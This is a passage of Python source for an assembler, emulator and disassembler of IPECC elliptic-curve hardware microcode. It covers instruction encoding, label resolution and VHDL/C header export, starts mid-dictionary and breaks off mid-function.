\"Ec\": \"11001\",\n \"BmXC\": \"01000\",\n \"MD\": \"01000\",\n \"Msq\": \"10101\",\n \"N\": \"01000\",\n \"Nsq\": \"01000\",\n \"Nsq0\": \"10111\",\n \"E\": \"01001\",\n \"L\": \"10000\",\n \"XpE\": \"10100\",\n \"BpL\": \"10001\",\n \"twoB\": \"10101\",\n \"threeB\": \"10111\",\n \"EpN\": \"11001\",\n \"YpZ\": \"10101\",\n \"YpZsq\": \"10101\",\n \"twoS\": \"10111\",\n\t\"Rmodp\": \"11101\",\n \"Qs\": \"01001\",\n \"AZ\": \"01000\",\n \"KK\": \"10000\",\n \"BZ\": \"10111\",\n \"BZd\": \"10111\",\n \"Xup\": \"01000\",\n \"Yup\": \"01001\",\n \"Ztmp\": \"11001\",\n \"Yopp\": \"10101\",\n \"Ykeep\": \"10000\",\n \"Xkeep\": \"10100\",\n # \"Patch\" operand, dummy value\n \"patchme\": \"10101\",\n ### Disassembly registers for\n ### recompiling the disassembly\n\t\"disass_r0\": \"00000\",\n\t\"disass_r1\": \"00001\",\n\t\"disass_r2\": 
\"00010\",\n\t\"disass_r3\": \"00011\",\n\t\"disass_r4\": \"00100\",\n\t\"disass_r5\": \"00101\",\n\t\"disass_r6\": \"00110\",\n\t\"disass_r7\": \"00111\",\n\t\"disass_r8\": \"01000\",\n\t\"disass_r9\": \"01001\",\n\t\"disass_r10\": \"01010\",\n\t\"disass_r11\": \"01011\",\n\t\"disass_r12\": \"01100\",\n\t\"disass_r13\": \"01101\",\n\t\"disass_r14\": \"01110\",\n\t\"disass_r15\": \"01111\",\n\t\"disass_r16\": \"10000\",\n\t\"disass_r17\": \"10001\",\n\t\"disass_r18\": \"10010\",\n\t\"disass_r19\": \"10011\",\n\t\"disass_r20\": \"10100\",\n\t\"disass_r21\": \"10101\",\n\t\"disass_r22\": \"10110\",\n\t\"disass_r23\": \"10111\",\n\t\"disass_r24\": \"11000\",\n\t\"disass_r25\": \"11001\",\n\t\"disass_r26\": \"11010\",\n\t\"disass_r27\": \"11011\",\n\t\"disass_r28\": \"11100\",\n\t\"disass_r29\": \"11101\",\n\t\"disass_r30\": \"11110\",\n\t\"disass_r31\": \"11111\",\n}\n\nFLAGS_BITS_SIZE = OPERANDS_BITS_SIZE\nipecc_flags_dict = {\n \"%mu0\" : \"10000\",\n \"%kb0\" : \"01000\",\n \"%par\" : \"00100\",\n \"%kap\" : \"00010\",\n \"%kapP\" : \"00001\",\n}\n\n# Internal IPECC flags, *Only* used\n# for emulation as they are of no use\n# for simple assemby/disassembly\nipecc_internal_flags_dict = {\n # Arithmetic carry flag\n \"%Carith\" : None,\n # Shift carry flag\n \"%Cshift\" : None,\n # Zero flag\n \"%Z\" : None,\n # Strictly negative flag\n \"%SN\" : None,\n}\n\n# Operands\ndef ipecc_operand():\n return key_words_regexp(ipecc_operands_dict.keys())\n# Flags\ndef ipecc_flag():\n return key_words_regexp(ipecc_flags_dict.keys())\ndef ipecc_internal_flag():\n return key_words_regexp(ipecc_internal_flags_dict.keys())\n# Numerical constant\ndef ipecc_const():\n return \"[0-9]+|0[x][0-9a-fA-F]+\"\n\nipecc_labels_dict = {\n # This is to be populated by the address resolver\n # pass\n}\n\nipecc_label_ = \"\"\ndef ipecc_label():\n global ipecc_labels_dict\n global ipecc_label_\n # Protect the '.'\n a = []\n for k in ipecc_labels_dict.keys():\n if k[0] == r'.':\n # NOTE: 1: to skip the '.', :-1 to remove the\n # final ':'\n a.append(r'\\.'+k[1:-1])\n ipecc_label_ = key_words_regexp(a)\n\n\nipecc_instructions_dict = {\n\t# NOP instruction\n\t\"NOP\" : ([], \"NOP\", \"0000\", None, nop_emulate),\n\t# arithmetic instructions\n\t# values here must match their equivalent ones in ecc_pkg.vhd!\n\t# (starting with the string \"OPCODE_ARITH_\")\n\t\"NNADD\" : ([ipecc_operand(), ipecc_operand(), ipecc_operand()], \"ARITH\", \"0001\", \"ADD\", nnadd_emulate),\n\t\"NNSUB\" : ([ipecc_operand(), ipecc_operand(), ipecc_operand()], \"ARITH\", \"0010\", \"SUB\", nnsub_emulate),\n\t\"NNSRL\" : ([ipecc_operand(), None, ipecc_operand()], \"ARITH\", \"0011\", \"SRL\", nnsrl_emulate),\n\t\"NNSLL\" : ([ipecc_operand(), None, ipecc_operand()], \"ARITH\", \"0100\", \"SLL\", nnsll_emulate),\n\t\"NNRND\" : ([None, None, ipecc_operand()], \"ARITH\", \"0101\", \"RND\", nnrnd_emulate),\n\t\"TESTPARS\" : ([ipecc_operand(), ipecc_const(), ipecc_flag()], \"ARITH\", \"0110\", \"TSH\", testpars_emulate),\n\t\"NNXOR\" : ([ipecc_operand(), ipecc_operand(), ipecc_operand()], \"ARITH\", \"0111\", \"XOR\", nnxor_emulate),\n\t\"FPREDC\" : ([ipecc_operand(), ipecc_operand(), ipecc_operand()], \"ARITH\", \"1000\", \"RED\", fpredc_emulate),\n\t\"TESTPAR\" : ([ipecc_operand(), None, ipecc_flag()], \"ARITH\", \"1001\", \"TST\", testpar_emulate),\n\t\"NNRNDM\" : ([None, None, ipecc_operand()], \"ARITH\", \"1010\", \"RNM\", nnrndm_emulate),\n\t\"NNDIV2\" : ([ipecc_operand(), None, ipecc_operand()], \"ARITH\", \"1011\", \"DIV\", 
nndiv2_emulate),\n\t\"NNRNDS\" : ([None, ipecc_const(), ipecc_operand()], \"ARITH\", \"1100\", \"RNH\", nnrnds_emulate),\n\t\"NNRNDF\" : ([None, ipecc_const(), ipecc_operand()], \"ARITH\", \"1101\", \"RNF\", nnrndf_emumate),\n\t\"NNSRLS\" : ([ipecc_operand(), ipecc_const(), ipecc_operand()], \"ARITH\", \"1110\", \"SRH\", nnsrls_emulate),\n\t# branch instructions, the None is to be updated with a\n # proper label after the first pass\n\t\"J\" : ([None], \"BRANCH\", \"0001\", \"B\", j_emulate),\n\t\"JZ\" : ([None], \"BRANCH\", \"0010\", \"BZ\", jz_emulate),\n\t\"JSN\" : ([None], \"BRANCH\", \"0011\", \"BSN\", jsn_emulate),\n\t\"JODD\" : ([None], \"BRANCH\", \"0100\", \"BODD\", jodd_emulate),\n\t\"JKAP\" : ([None], \"BRANCH\", \"0101\", \"BKAP\", jkap_emulate),\n\t\"JL\" : ([None], \"BRANCH\", \"0110\", \"CALL\", jl_emulate),\n\t\"JLSN\" : ([None], \"BRANCH\", \"0111\", \"CALLSN\", jlsn_emulate),\n\t\"RET\" : ([], \"BRANCH\", \"1000\", \"RET\", ret_emulate),\n # \"Pseudo\" instructions, None encoding means nothing\n # to encode\n \"BARRIER\" : ([], \"PSEUDO\", None, None, barrier_emulate),\n \"STOP\" : ([], \"PSEUDO\", None, None, stop_emulate),\n # \"Aliases\": empty encoding means an alias\n \"NNCLR\" : ([ipecc_operand()], \"ALIAS\", \"NNADD\", ['zero', 'zero', 'OPERAND0'], None),\n \"NNMOV\" : ([ipecc_operand(), ipecc_operand()], \"ALIAS\", \"NNADD\", ['OPERAND0', 'zero', 'OPERAND1'], None),\n \"B\" : ([None], \"ALIAS\", \"J\", ['OPERAND0'], None),\n \"BZ\" : ([None], \"ALIAS\", \"JZ\", ['OPERAND0'], None),\n \"BSN\" : ([None], \"ALIAS\", \"JSN\", ['OPERAND0'], None),\n \"BODD\" : ([None], \"ALIAS\", \"JODD\", ['OPERAND0'], None),\n \"BKAP\" : ([None], \"ALIAS\", \"JKAP\", ['OPERAND0'], None),\n \"CALL\" : ([None], \"ALIAS\", \"JL\", ['OPERAND0'], None),\n \"CALLSN\" : ([None], \"ALIAS\", \"JLSN\", ['OPERAND0'], None),\n}\n\ndef ipecc_instruction():\n return key_words_regexp(ipecc_instructions_dict.keys())\n\n# Refresh our instructions dict\ndef ipecc_instructions_dict_refresh_operands():\n global ipecc_instructions_dict\n for k in ipecc_instructions_dict.keys():\n a = ipecc_instructions_dict[k]\n ops = []\n for op in ipecc_instructions_dict[k][0]:\n if (op is not None) and (op != ipecc_const()) and (op != ipecc_label_) and (op != ipecc_flag()):\n # This is an operand() type, refresh it\n ops.append(ipecc_operand())\n else:\n ops.append(op)\n a = (ops, a[1], a[2], a[3], a[4])\n ipecc_instructions_dict[k] = a\n\n\nipecc_instructions_types_dict = {\n \"NOP\" : \"00\",\n \"ARITH\" : \"01\",\n \"BRANCH\" : \"10\",\n}\n\n##########################################################\ndef getbitlen(bint):\n \"\"\"\n Returns the number of bits encoding an integer\n \"\"\"\n if bint is None:\n return 0\n if bint == 0:\n # Zero is encoded on one bit\n return 1\n return int(bint).bit_length()\n\n# Integer to binary string\ndef int_to_binstring(a, nbits):\n ret = \"\"\n for i in range(0, nbits):\n if (a >> (nbits - i - 1)) & 1 == 1:\n ret += \"1\"\n else:\n ret += \"0\"\n return ret\n\n# Binary string to integer\ndef binstring_to_int(b):\n ret = 0\n for i in range(0, len(b)):\n if b[len(b) - i - 1] == \"1\":\n ret |= (0x1 << i)\n return ret\n\ndef term_colors_supported():\n # Only use colors in a real terminal\n return sys.stdout.isatty()\n\ndef print_error(err, l, reason):\n if term_colors_supported() is True:\n print(bcolors.FAIL+err+bcolors.ENDC + bcolors.HEADER+l+bcolors.ENDC + bcolors.OKCYAN+reason+bcolors.ENDC)\n else:\n print(err + l + reason)\n\ndef print_warning(err, reason):\n if 
term_colors_supported() is True:\n print(bcolors.WARNING+err+bcolors.ENDC + bcolors.WARNING+reason+bcolors.ENDC)\n else:\n print(err + reason)\n\ndef print_info(inf, msg):\n if term_colors_supported() is True:\n print(bcolors.OKCYAN+inf+bcolors.ENDC + bcolors.OKBLUE+msg+bcolors.ENDC)\n else:\n print(inf + msg)\n\ndef print_progress(msg):\n if term_colors_supported() is True:\n print(bcolors.OKGREEN+msg+bcolors.ENDC)\n else:\n print(msg)\n\n##########################################################\n# Resolve the labels addresses and populate the\n# labels dict\ndef resolve_labels(asm):\n lines = asm.splitlines()\n address = 0\n for l in lines:\n # Skip comments\n comment = re.search(r\"^\\s*#\", l)\n empty_line = re.search(r\"^\\s*$\", l)\n if (comment is None) and (empty_line is None):\n # Actual label or opcode\n label = re.search(r\"^\\s*(\\.[a-zA-Z0-9].*:)\\s*(#.*)*$\", l)\n opcode = re.search(r\"^\\s*(\"+ipecc_instruction()+r\")\", l, flags=re.IGNORECASE)\n if label is not None:\n label = label.group(1)\n # We have a new label!\n ipecc_labels_dict[label] = (int_to_binstring(address, IMMEDIATE_BITS_SIZE), hex(address))\n if opcode is not None:\n # If we have a pseudo instruction do not increment,\n # else increment\n opcode = opcode.group(1).upper()\n if ipecc_instructions_dict[opcode][1] != \"PSEUDO\":\n # Increment our address count\n address += 1\n # Update our labels list\n ipecc_label()\n # Update our instructions dictionary\n for k in ipecc_instructions_dict.keys():\n if ipecc_instructions_dict[k][0] == [None]:\n ipecc_instructions_dict[k][0][0] = ipecc_label_\n\n# Encode the opcodes\ndef encode_opcodes(asm):\n lines = asm.splitlines()\n line_num = 1\n # The encoding\n encoding = \"\"\n barrier_set = False\n abstract_asm_representation = []\n current_addr = 0\n for l in lines:\n # Local options flags\n OPTIONS = []\n OPERANDS = []\n # Operands for our abstract representation\n ABSTRACT_OPERANDS = [None, None, None]\n # Skip comments, empty lines and labels\n comment = re.search(r\"^\\s*#\", l)\n empty_line = re.search(r\"^\\s*$\", l)\n label = re.search(r\"^\\s*(\\.[a-zA-Z0-9].*:)\\s*(#.*)*$\", l)\n if (comment is None) and (empty_line is None) and (label is None):\n inst = re.search(r\"^\\s*(\"+ipecc_instruction()+r\")([,\\s]+.*)\", l, flags=re.IGNORECASE)\n if inst is None:\n inst = re.search(r\"^\\s*(\"+ipecc_instruction()+r\")(,.*)\", l, flags=re.IGNORECASE)\n if inst is None:\n inst = re.search(r\"^\\s*(\"+ipecc_instruction()+r\")(#.*)*$(.*)\", l, flags=re.IGNORECASE)\n if inst is None:\n print_error(\"Syntax error line %d: \" % line_num, l, \", unknown instruction\")\n sys.exit(-1)\n options = None\n operands = None\n instruction = inst.group(1).upper()\n rest = inst.group(2)\n #################################\n ## Try to get the possible options\n if rest is not None:\n # Now get the possible options\n options = re.search(r\"(,p[0-9]+|,X|,M)?(,p[0-9]+|,X|,M)?(,p[0-9]+|,X|,M)?(.*)\", rest)\n if options is not None:\n if options.group(1) is not None:\n OPTIONS.append(options.group(1)[1:])\n if options.group(2) is not None:\n OPTIONS.append(options.group(2)[1:])\n if options.group(3) is not None:\n OPTIONS.append(options.group(3)[1:])\n if options.group(4) is not None:\n rest = options.group(4)\n # Sanity check on the options\n check = 0\n if 'X' in OPTIONS:\n check += 1\n if 'M' in OPTIONS:\n check += 1\n if len(OPTIONS) > (check + 1):\n print_error(\"Syntax error line %d: \" % line_num, l, \", too many extensions or patches for instruction\")\n sys.exit(-1)\n 
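# At this point OPTIONS holds the parsed suffixes: at most one patch id (pN) plus\n # the optional X and M extension flags, as enforced by the check just above;\n # e.g. the source line \"NNADD,X,p3 zero one R\" yields OPTIONS == ['X', 'p3']\n # with \" zero one R\" left over as the operand string.\n 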
#################################\n # Try to get the operands\n # Get the instruction semantic\n semantic = ipecc_instructions_dict[instruction]\n # Construct our operand pattern from the semantic\n op_re = r\"^\\s*\"\n local_num_operands = 0\n for op in semantic[0]:\n if op is not None:\n local_num_operands += 1\n op_re += r\"(\"+op+r\")\" + r\"\\s*\"\n op_re += r\"(#.*)*$\"\n if (rest is None) and (local_num_operands > 0):\n print_error(\"Syntax error line %d: \" % line_num, l, \", instruction expects operands\")\n sys.exit(-1)\n if rest is not None:\n # If we do not have arguments, check that we have nothing left\n if local_num_operands == 0:\n op_re_noop = r\"^\\s*(#.*)*$\"\n check = re.search(op_re_noop, rest)\n if check is None:\n print_error(\"Syntax error line %d: \" % line_num, l, \", operands provided for a no-operand instruction\")\n sys.exit(-1)\n operands = re.search(op_re, rest)\n if operands is None:\n print_error(\"Syntax error line %d: \" % line_num, l, \" bad operands\")\n if ipecc_instructions_dict[instruction][1] == \"BRANCH\":\n print_info(\"Hint: \", \"this is a branch instruction: have you defined the target label?\")\n else:\n print_info(\"Hint: \", \"check the operands: are they well defined in the CSV?\")\n sys.exit(-1)\n # Do we have arguments to parse?\n for i in range(0, local_num_operands):\n if operands.group(i+1) is None:\n print_error(\"Syntax error line %d: \" % line_num, l, \" bad operands\")\n print_info(\"Hint: \", \"check the operands: are they well defined in the CSV?\")\n sys.exit(-1)\n OPERANDS.append(operands.group(i+1))\n # Handle the ALIASes here\n if ipecc_instructions_dict[instruction][1] == \"ALIAS\":\n # Get the aliased instruction true semantic\n unaliased_instruction = ipecc_instructions_dict[instruction][2]\n # Get the operands semantic\n sem = ipecc_instructions_dict[instruction][3]\n # Replace our instruction\n instruction = unaliased_instruction\n # Handle our operands\n NEWOPERANDS = []\n for op in sem:\n aa = re.search(r\"OPERAND([0-9]+)\", op)\n if aa is not None:\n # Original operand\n op_num = int(aa.group(1))\n NEWOPERANDS.append(OPERANDS[op_num])\n else:\n # External operand\n NEWOPERANDS.append(op)\n OPERANDS = NEWOPERANDS\n if ipecc_instructions_dict[instruction][1] == \"PSEUDO\":\n if instruction == \"BARRIER\":\n barrier_set = True\n else:\n barrier_set = False\n if instruction == \"STOP\":\n # Patch our \"S\" bit in the previous instruction\n encoding = encoding.replace('S', '1')\n else:\n # Patch our \"S\" bit in the previous instruction\n encoding = encoding.replace('S', '0')\n current_encoding = \"\"\n if ipecc_instructions_dict[instruction][1] != \"PSEUDO\":\n # Patch our \"S\" bit in the previous instruction\n encoding = encoding.replace('S', '0')\n # OK, now proceed with the current_encoding of the opcode\n ### Bits 31 and 30 that handle BARRIER and STOP\n # Bit 31 is set if the next instruction is a STOP\n # NOTE => this should be handled in the next loop\n # iteration\n current_encoding += \"S\" # To be patched\n # BIT 30 is set if the previous instruction is a BARRIER\n if barrier_set is True:\n current_encoding += \"1\"\n barrier_set = False\n else:\n current_encoding += \"0\"\n ### Bits 29 downto 28 (either ARITH or BRANCH) & 27 downto 24 (OPCODE)\n current_encoding += ipecc_instructions_types_dict[ipecc_instructions_dict[instruction][1]]\n current_encoding += ipecc_instructions_dict[instruction][2]\n ### Bit 23 encodes the 'X' (eXtended arithmetic)\n if 'X' in OPTIONS:\n current_encoding += \"1\"\n else:\n 
current_encoding += \"0\"\n ### Bit 22 downto 16 (bit 22 is set to 1 if there is a patch, 0 otherwise\n ### bits 21 downto 16 encode a 6-bit patch ID if bit 22 is 1)\n PATCH = False\n for p in OPTIONS:\n aa = re.search(r\"p([0-9]+)\", p)\n if aa is not None:\n patch_num = int(aa.group(1))\n if patch_num >= 2**PATCH_BITS_SIZE:\n print_error(\"Syntax error line %d: \" % line_num, l, \", patch number %d exceed %d-bit width\" % (patch_num, PATCH_BITS_SIZE))\n sys.exit(-1)\n PATCH = True\n current_encoding += (\"1\" + int_to_binstring(patch_num, PATCH_BITS_SIZE))\n break\n if PATCH is False:\n current_encoding += (\"0\" + (\"0\" * PATCH_BITS_SIZE))\n ### Bit 15 is the 'M' flag\n if 'M' in OPTIONS:\n current_encoding += \"1\"\n else:\n current_encoding += \"0\"\n ### Bit 14 downto 0 are the operands\n if ipecc_instructions_dict[instruction][1] == \"NOP\":\n # No operand for NOP\n current_encoding += \"0\" * (3 * OPERANDS_BITS_SIZE)\n elif ipecc_instructions_dict[instruction][1] == \"ARITH\":\n # Some sanity checks\n if len(OPERANDS) > 3:\n print_error(\"Syntax error line %d: \" % line_num, l, \", operands number %d > 3 for ARITH instruction\" % (len(OPERANDS)))\n sys.exit(-1)\n # Put our operands\n num_op = 0\n real_num_op = 0\n for opn in range(0, 3):\n if ipecc_instructions_dict[instruction][0][opn] is None:\n # Skip None operands\n current_encoding += \"0\" * OPERANDS_BITS_SIZE\n real_num_op += 1\n continue\n # Do we have flags?\n if ipecc_instructions_dict[instruction][0][opn] == ipecc_flag():\n # Extract our flag\n current_encoding += ((FLAGS_BITS_SIZE - 5) * \"0\") + ipecc_flags_dict[OPERANDS[num_op]]\n ABSTRACT_OPERANDS[real_num_op] = (\"FLAG\", OPERANDS[num_op], binstring_to_int(ipecc_flags_dict[OPERANDS[num_op]]))\n # Update the abstract representation\n real_num_op += 1\n num_op += 1\n # Do we have a constant?\n elif ipecc_instructions_dict[instruction][0][opn] == ipecc_const():\n constant = int(OPERANDS[num_op])\n if constant > 2**CONSTANTS_BITS_SIZE:\n print_error(\"Syntax error line %d: \" % line_num, l, \", constant %d exceeds the %d bits size\" % (constant, CONSTANTS_BITS_SIZE))\n sys.exit(-1)\n # Put it in the LSB of the operand field\n current_encoding += ((OPERANDS_BITS_SIZE - CONSTANTS_BITS_SIZE) * \"0\") + int_to_binstring(constant, CONSTANTS_BITS_SIZE)\n # Update the abstract representation\n ABSTRACT_OPERANDS[real_num_op] = (\"CONST\", None, constant)\n real_num_op += 1\n num_op += 1\n # Else we have a regular operand\n else:\n # The \"patchme\" operand is automatically handled here\n current_encoding += ((OPERANDS_BITS_SIZE - 5) * \"0\") + ipecc_operands_dict[OPERANDS[num_op]]\n # Update the abstract representation\n ABSTRACT_OPERANDS[real_num_op] = (\"OP\", OPERANDS[num_op], binstring_to_int(ipecc_operands_dict[OPERANDS[num_op]]))\n num_op += 1\n real_num_op += 1\n elif ipecc_instructions_dict[instruction][1] == \"BRANCH\":\n # Our branch instructions must have at most one operand\n if len(OPERANDS) > 1:\n print_error(\"Syntax error line %d: \" % line_num, l, \", operands number %d > 1 for BRANCH instruction\" % (len(OPERANDS)))\n sys.exit(-1)\n # Extract the immediate\n if len(OPERANDS) == 1:\n label = OPERANDS[0]\n immediate = ipecc_labels_dict[label+\":\"][0]\n current_encoding += (((3 * OPERANDS_BITS_SIZE) - IMMEDIATE_BITS_SIZE) * \"0\") + immediate\n # Update the abstract representation\n ABSTRACT_OPERANDS[0] = (\"IMM\", label, binstring_to_int(immediate))\n else:\n current_encoding += (3 * OPERANDS_BITS_SIZE) * \"0\"\n else:\n print_error(\"Syntax error line %d: \" 
% line_num, l, \", unkown instruction type %s\" % (ipecc_instructions_dict[instruction][1]))\n sys.exit(-1)\n ##########\n # Sanity checks on the result\n if len(current_encoding) != (5 + OPCODE_CLASS_BITS_SIZE + OPCODE_BITS_SIZE + PATCH_BITS_SIZE + (3 * OPERANDS_BITS_SIZE)):\n print_error(\"Syntax error line %d: \" % line_num, l, \", internal error: encoding is %d instead of %d\" % (len(current_encoding), (5 + OPCODE_CLASS_BITS_SIZE + OPCODE_BITS_SIZE + PATCH_BITS_SIZE + (3 * OPERANDS_BITS_SIZE))))\n sys.exit(-1)\n encoding += current_encoding + \"\\n\"\n ### Add the abstract representation\n abstract_asm_representation.append((current_addr, instruction, OPTIONS, ABSTRACT_OPERANDS, l))\n if ipecc_instructions_dict[instruction][1] != \"PSEUDO\":\n current_addr += 1\n line_num += 1\n # Remove our trailing 'S'\n if 'S' in encoding:\n encoding = encoding.replace('S', '0')\n return (encoding, abstract_asm_representation)\n\ndef assemble_file(infile):\n with open(infile, \"r\") as f:\n asm = f.read()\n # First pass to resolve the labels\n resolve_labels(asm)\n print(\" -> First pass for labels resolution done\")\n # Second pass for encoding opcodes\n (encoding, abstract_asm) = encode_opcodes(asm)\n print(\" -> Second pass for opcode encoding done\")\n # Now format our assembly output\n output = \"\"\n lines = encoding.splitlines()\n line_num = 1\n address = 0\n addr_digits_10 = str(len(str(len(lines))))\n addr_digits_x = str(len(str(hex(len(lines)))) - 2) # -2 to account for initial \"0x\" added by str on an hex\n for l in lines:\n if len(l) % 8 == 0:\n form = str(2*(len(l) // 8))\n else:\n form = str(2*((len(l) // 8) + 1))\n output += (\"\\t\\t\\\"%s\\\", -- 0x%0\"+addr_digits_x+\"x (%0\"+addr_digits_10+\"d)\\t\\t\\t(0x%0\"+form+\"x)\") % (l, address // len(l), address // len(l), binstring_to_int(l))\n if line_num != len(lines):\n output += \"\\n\"\n line_num += 1\n address += len(l)\n output = ecc_curve_iram_begin + output + ecc_curve_iram_end\n outfile = os.path.splitext(infile)[0] + \".vhd\"\n with open(outfile, \"w\") as f:\n f.write(output)\n print_progress(\"[+] Assembling file %s done in %s\" % (infile, outfile))\n # Export our symbols in ecc_addr.vhd\n output = \"\"\n output_h = \"\"\n for k in ipecc_labels_dict.keys():\n # If the label is suffixed with \"L_export\", we have\n # to export it\n check = re.search(r\"L_export:\", k)\n if check is not None:\n k_ = k.replace(r\"L_export:\", \"\")[1:]\n output += \"\\tconstant ECC_IRAM_\"+k_.upper()+\"_ADDR : std_logic_vector(IRAM_ADDR_SZ - 1 downto 0) := \"\n output += (\"\\\"\"+ipecc_labels_dict[k][0]+\"\\\"; -- %s\\n\") % ipecc_labels_dict[k][1]\n output_h += (\"#define ECC_IRAM_\"+k_.upper()+\"_ADDR %s\\n\") % ipecc_labels_dict[k][1]\n output = ecc_addr_begin + output + ecc_addr_end\n output_h += ecc_addr_h_middle\n for k in ipecc_labels_dict.keys():\n # If the label is suffixed with \"L_dbg\", we have\n # to export it also to the C header output file\n check = re.search(r\"L_dbg:\", k)\n if check is not None:\n k_ = k.replace(r\"L_dbg:\", \"\")[1:]\n output_h += (\"#define DEBUG_ECC_IRAM_\"+k_.upper()+\"_ADDR %s\\n\") % ipecc_labels_dict[k][1]\n output_h = ecc_addr_h_begin + output_h + ecc_addr_h_end\n #outfile = os.path.splitext(infile)[0] + \"_addr.vhd\"\n outfile = \"ecc_addr.vhd\"\n outfile_h = \"ecc_addr.h\"\n with open(outfile, \"w\") as f:\n f.write(output)\n with open(outfile_h, \"w\") as f:\n f.write(output_h)\n print_progress(\"[+] Exported VHDL addresses of %s done in %s (C header: %s)\" % (infile, outfile, outfile_h))\n\ndef 
get_dec_hexa_bin_value(inval):\n try:\n val = int(inval)\n except:\n val = inval \n if val[1] == 'x':\n val = int(inval, 16)\n else:\n val = int(inval, 2)\n return val\n \ndef emulate_file(infile, initial_state):\n # First, interpret our initial state\n initial_state = initial_state.splitlines()\n line_num = 1\n ip = lrip = breakip = verbosity = None\n flags = []\n registers = []\n print(\" -> Parsing stding for options\")\n for l in initial_state:\n # Skip empty lines and comments\n comment = re.search(r\"^\\s*#\", l)\n empty_line = re.search(r\"^\\s*$\", l)\n if (comment is not None) or (empty_line is not None):\n line_num += 1\n continue\n check = re.search(r\"^\\s*(\"+ipecc_operand()+\"|\"+ipecc_flag()+\"|\"+ipecc_internal_flag()+\"|mem\\[([0-9]+|0x[0-9a-fA-F]+|0b[0-1]+)\\]|ip|lrip|breakip|verbose)\\s*=\\s*([0-9]+|0x[0-9a-fA-F]+|0b[0-1]+)\\s*(#.*)*$\", l)\n if check is None:\n print_error(\"Error line %d: \" % line_num, \"%s syntax error\" % l, \" unknown token\")\n sys.exit(-1)\n ## Find our initial state, this consists of\n ## Getting registers values and flags\n check = re.search(r\"^\\s*(\"+ipecc_operand()+\")\\s*=\\s*([0-9]+|0x[0-9a-fA-F]+|0b[0-1]+)\\s*(#.*)*$\", l)\n if check is not None:\n reg = check.group(1)\n val = get_dec_hexa_bin_value(check.group(2))\n if val >= 2**BIGNUM_BITS_SIZE:\n print_error(\"Error line %d: \" % line_num, \"%s: register %s has bad value\" % (l, reg), \" %d exceeds bignum size %d\" % (val, BIGNUM_BITS_SIZE))\n sys.exit(-1)\n registers.append((binstring_to_int(ipecc_operands_dict[reg]), val))\n check = re.search(r\"^\\s*(\"+ipecc_flag()+\"|\"+ipecc_internal_flag()+\")\\s*=\\s*([0-9]+|0x[0-9a-fA-F]+|0b[0-1]+)\\s*(#.*)*$\", l)\n if check is not None:\n flag = check.group(1)\n val = get_dec_hexa_bin_value(check.group(2))\n flags.append((flag, val))\n if (val != 0) and (val != 1):\n print_error(\"Error line %d: \" % line_num, \"%s: flag %s has bad value\" % (l, flag), \" only 0/1 binary value is allowed\")\n sys.exit(-1)\n ## Getting possible ip, lrip, breakip\n check = re.search(r\"^\\s*(ip|lrip|breakip)\\s*=\\s*([0-9]+|0x[0-9a-fA-F]+|0b[0-1]+)\\s*(#.*)*$\", l)\n if check is not None:\n val = get_dec_hexa_bin_value(check.group(2))\n if val >= 2**IMMEDIATE_BITS_SIZE:\n print_error(\"Error line %d: \" % line_num, \"%s: %s has bad value\" % (l, check.group(1)), \" %d exceeds instruction bus width (%d bits)\" % (val, IMMEDIATE_BITS_SIZE))\n sys.exit(-1)\n if check.group(1) == \"ip\":\n ip = val\n elif check.group(1) == \"lrip\":\n lrip = val\n elif check.group(1) == \"breakip\":\n breakip = val\n else:\n print_error(\"Error line %d: \" % line_num, \"%s syntax error\" % l, \" unknown token\")\n sys.exit(-1)\n ## Getting verbosity\n check = re.search(r\"^\\s*(verbose)\\s*=\\s*([0-9]+|0x[0-9a-fA-F]+|0b[0-1]+)\\s*(#.*)*$\", l)\n if check is not None:\n verbosity = get_dec_hexa_bin_value(check.group(2))\n ## Initialize our context with proper values\n context = IPECCExecutionContext(registers, flags, ip, lrip)\n with open(infile, \"r\") as f:\n asm = f.read()\n # First pass to resolve the labels\n resolve_labels(asm)\n print(\" -> First pass for labels resolution done\")\n # Second pass for encoding opcodes\n (encoding, abstract_asm) = encode_opcodes(asm)\n print(\" -> Second pass for opcode encoding done\")\n # First, check if the asked address for ip and rip and breakip are indeed in our\n # range and classify our opcodes in an address base dictionnary\n abstract_asm_dict = {}\n for ins in abstract_asm: \n (current_addr, instruction, OPTIONS, ABSTRACT_OPERANDS, 
l) = ins\n if current_addr not in abstract_asm_dict.keys():\n abstract_asm_dict[current_addr] = [ ins ]\n else:\n abstract_asm_dict[current_addr].append(ins)\n if (ip is not None):\n if ip not in abstract_asm_dict.keys():\n print_error(\"Error: \", \"bad ip value %d\" % ip, \" ip not in allowed range for the program\")\n sys.exit(-1)\n context.ip = ip\n else:\n context.ip = 0\n if (lrip is not None):\n if lrip not in abstract_asm_dict.keys():\n print_error(\"Error: \", \"bad lrip value %d\" % lrip, \" lrip not in allowed range for the program\")\n sys.exit(-1)\n context.lrip = lrip\n if (breakip is not None):\n if breakip not in abstract_asm_dict.keys():\n print_error(\"Error: \", \"bad breakip value %d\" % breakip, \" breakip not in allowed range for the program\")\n sys.exit(-1)\n context.breakip = breakip\n # Our execution loop\n stop = False\n while True:\n # Execute in a loop\n all_ins_at_ip = abstract_asm_dict[context.ip]\n for ins in all_ins_at_ip:\n (current_addr, instruction, OPTIONS, ABSTRACT_OPERANDS, l) = ins\n # Get the routine to execute\n emulation_routine = ipecc_instructions_dict[instruction][4]\n context = emulation_routine(ins, context)\n if verbosity is not None:\n print(context)\n # Do we have to stop?\n if instruction == \"STOP\":\n print_info(\"Hitting STOP\", \"\")\n stop = True\n break\n if context.ip == breakip:\n stop = True\n print_info(\"Hitting breakip: \", \"breakip = %d\" % breakip)\n break\n if stop is True:\n break\n print(context)\n return\n\n##########################################################\ndef disassemble(binary):\n lines = binary.splitlines()\n line_num = 1\n # Compute our instruction size\n instructions_size = (5 + OPCODE_CLASS_BITS_SIZE + OPCODE_BITS_SIZE + PATCH_BITS_SIZE + (3 * OPERANDS_BITS_SIZE))\n disass_output = []\n instructions_num = 0\n jump_targets = []\n for l in lines:\n local_disass_output = \"\"\n bitstring = l\n if len(bitstring) != instructions_size:\n print_error(\"Error line %d: \" % line_num, \"\", \"instruction size %d != %d mismatch\" % (len(bitstring), instructions_size))\n sys.exit(-1)\n # We have our instruction, split it\n pos = 0\n stop = bitstring[pos]\n pos += 1\n barrier = bitstring[pos]\n pos += 1\n instruction_type = bitstring[pos:pos+OPCODE_CLASS_BITS_SIZE]\n pos += OPCODE_CLASS_BITS_SIZE\n instruction_opcode = bitstring[pos:pos+OPCODE_BITS_SIZE]\n pos += OPCODE_BITS_SIZE\n X = bitstring[pos]\n pos += 1\n is_patch = bitstring[pos]\n pos += 1\n patch = bitstring[pos:pos+PATCH_BITS_SIZE]\n pos 